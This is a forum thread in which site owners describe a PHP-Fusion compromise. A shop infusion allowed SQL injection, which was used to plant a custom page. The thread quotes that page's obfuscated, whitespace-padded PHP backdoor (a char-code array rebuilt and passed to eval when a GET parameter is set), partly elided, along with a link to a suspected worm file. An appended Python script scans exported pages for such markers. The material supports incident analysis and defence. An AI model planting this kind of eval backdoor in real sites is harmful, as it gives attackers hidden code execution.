
My site was hacked

Have had the same experience with a customer's site. A hacker injected some code in a custom_pages page and used this (as far as I can see) to execute something through viewpage.php.
Would be interesting to know what infusions and other scripts you had installed on your webspace...

First, check the fusion_errors table, as trojans are often not programmed that cleanly and tend to produce warnings or errors. This record revealed the weak spot on my site to me:

(121, 8, 'A non well formed numeric value encountered', '/web/1/000/051/562/203796/htdocs/infusions/shop_system/warenkorb.php', 121, '/infusions/shop_system/warenkorb.php', 0, '85.25.71.100', 4, 0, 1360061166),



Using warenkorb.php for SQL code injection, a new record was added to fusion_custom_pages this way:

(2, 'testtitl', 0, '                                                                                                         <?php if(isset($_GET[\\''viewpages\\''])) { $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,
...
...
0,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit; } ?>   



I deleted the record and, in the Laaser shop system, which allowed code injection, encapsulated all $_GET and $_POST references with connections to MySQL queries in mysql_real_escape_string() function calls.
new worm www.alecxz.altervista.org/infusions/image_hosting/thumbs/1d915cf1732ff8ac7dd34671df14fb7f.jpg
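
Added example, not part of any post in this thread or of PHP-Fusion's own code: a Python triage script that scans rows exported from fusion_custom_pages for the markers visible in the injected record quoted above (PHP open tag, request superglobals, eval, whitespace padding, a long array of character codes) and decodes the character codes statically, without executing them. The row layout (id, title, content), the function names and the sample rows are assumptions constructed for illustration.

```python
import re

# A list of 8 or more decimal character codes inside array(...), as in the quoted record.
CHARCODES = re.compile(r"array\(\s*((?:\d{1,3}\s*,\s*){7,}\d{1,3})\s*\)")
MARKERS = {
    "php_open_tag": re.compile(r"<\?php", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "request_input": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "whitespace_padding": re.compile(r"[ \t]{40,}"),
}

# Constructed sample rows (page_id, title, content); the hidden code is an inert echo.
_PAYLOAD = ",".join(str(ord(ch)) for ch in 'echo "constructed sample";')
SAMPLE_ROWS = [
    (1, "About us", "<p>Opening hours and contact details.</p>"),
    (2, "sample page", " " * 60 + "<?php if(isset($_GET['x'])) { $d='';foreach(array("
        + _PAYLOAD + ")as$c){$d.=sprintf('%c',$c);}eval($d);exit; } ?>"),
]


def decode_charcodes(content):
    """Turn each array(36,112,...) into readable text; nothing is executed."""
    out = []
    for m in CHARCODES.finditer(content):
        codes = [int(n) for n in m.group(1).split(",")]
        out.append("".join(chr(c) if 32 <= c < 127 else "." for c in codes))
    return out


def scan_page(page_id, title, content):
    """Return a finding dict for one custom-page row, or None if no marker matches."""
    hits = [name for name, rx in MARKERS.items() if rx.search(content)]
    decoded = decode_charcodes(content)
    if decoded:
        hits.append("charcode_array")
    if not hits:
        return None
    return {"page_id": page_id, "title": title, "markers": sorted(hits), "decoded": decoded}


def scan_rows(rows):
    """Scan every (page_id, title, content) row and keep only the findings."""
    return [f for f in (scan_page(*r) for r in rows) if f]


if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
```

Custom pages that legitimately contain PHP will also match php_open_tag, so a finding is a prompt to review the row rather than proof of compromise.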